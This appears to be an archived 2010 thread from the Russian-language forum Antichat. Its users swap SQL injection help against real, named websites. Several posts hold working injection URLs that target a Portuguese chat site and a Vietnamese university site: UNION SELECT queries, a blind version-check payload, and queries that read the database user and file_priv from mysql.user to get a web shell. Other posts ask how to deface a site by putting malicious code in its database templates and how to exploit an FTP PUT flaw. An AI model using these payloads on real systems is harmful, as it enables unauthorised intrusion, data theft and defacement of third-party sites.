ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

06.07.2010, 20:33
|
|
Новичок
Регистрация: 03.01.2009
Сообщений: 27
Провел на форуме: 367442
Репутация:
41
|
|
Сообщение от durito
durito said:
http://www.portugal-tchat.com/host_mes_images/view/870+union+select+1,2,3,4,5,6,7,8,9,10,11
подскажите, куды копать дальше?
Как вариант...
http://www.portugal-tchat.com/host_mes_images/view/870+and+if(mid(version(),1,1)=5,1,(select+1+union+ select+2))
Условие выполняется - картинка, не выполняется - error.
Возможно все гораздо проще можно сделать...
|
|
|

06.07.2010, 22:01
|
|
Участник форума
Регистрация: 18.04.2009
Сообщений: 120
Провел на форуме: 435863
Репутация:
80
|
|
Ребята, подскажи по поводу использования UPDATE в инъекциях.
Значит есть инъекция
UNION+SELECT+1,test_data,3+FROM+test_table+--+
пробую изменить значение test_data допустим на 12345 вот таким запросом
UNION+UPDATE+test_table+SET+test_data='12345'+WHER E+test_data2='lol'+--+
в результате выбивает ошибку вида
Сообщение от None
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION+UPDATE+test_table+SET+test_data='12345'+WHE RE+test_data2='lol'+--+' at line 1
пробовал заменять значение на HEX кодировку, то есть вместо ='12345' тулил =0x3132333435. Результат - опять таки ошибка.
Подскажите, может быть я не так использую UPDATE, и всё дело в неправильном синтаксисе? Заранее благодарен.
|
|
|

06.07.2010, 22:03
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме: 5011696
Репутация:
2221
|
|
Если запрсос select, значит SELECT, нельзя insert, update, и т.п., можно только выборку из бд делать.
|
|
|

06.07.2010, 22:18
|
|
Guest
Сообщений: n/a
Провел на форуме: 218
Репутация:
0
|
|
А если у нас основной запрос вроде INSERT+INTO+test_table+(test_data)+VALUES+(lol), то UNION INSERT или UNION UPDATE прокатит?
|
|
|
|

06.07.2010, 22:45
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме: 5011696
Репутация:
2221
|
|
Нет. Вы вообще вкурсе что делает union?
|
|
|

06.07.2010, 22:47
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме: 4072944
Репутация:
1550
|
|
мдяс, думаю на лето надо закрыть данный раздел..так как 99% вопросы по скулям..причем стандартные вопросы, ответы на которые можно спокойно найти на форуме потратив 30 секунд
|
|
|

07.07.2010, 11:01
|
|
Новичок
Регистрация: 27.05.2010
Сообщений: 13
Провел на форуме: 20441
Репутация:
0
|
|
Этот сайт позволяет file_priv, но мы можем заполнить оболочку?
http://www.dce.hcmut.edu.vn/vi/tintuc/index.php?id=400%20and%201=0%20UNION%20SELECT%201, file_priv,3,4,5,6,7,8,9%20from%20mysql.user+--+
|
|
|

07.07.2010, 12:22
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме: 2052341
Репутация:
95
|
|
как получив шелл на фтп, можно заменить все шаблоны в БАЗЕ данных на вредноносный код(дефейс)?
|
|
|

07.07.2010, 13:08
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме: 6075534
Репутация:
2731
|
|
Сообщение от haito
haito said:
Этот сайт позволяет file_priv, но мы можем заполнить оболочку?
http://www.dce.hcmut.edu.vn/vi/tintuc/index.php?id=400%20and%201=0%20UNION%20SELECT%201, file_priv,3,4,5,6,7,8,9%20from%20mysql.user+--+
У твоего пользователя нету file_priv:
Код:
Code:
http://www.dce.hcmut.edu.vn/vi/tintuc/index.php?id=400%20and%201=0%20UNION%20SELECT%201,user(),3,4,5,6,7,8,9+--+
Получаем юзера - DCE. Смотрим дальше:
Код:
Code:
http://www.dce.hcmut.edu.vn/vi/tintuc/index.php?id=400%20and%201=0%20UNION%20SELECT%201,concat_ws(0x3a,user,file_priv),'3',4,5,6,7,8,9%20from%20mysql.user+limit+5,1+--+
Результат:
|
|
|

07.07.2010, 14:51
|
|
Постоянный
Регистрация: 27.09.2008
Сообщений: 469
Провел на форуме: 784549
Репутация:
309
|
|
как использовать " PUT " уязвимость, в FTP ?..... (удаленный сервер)
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|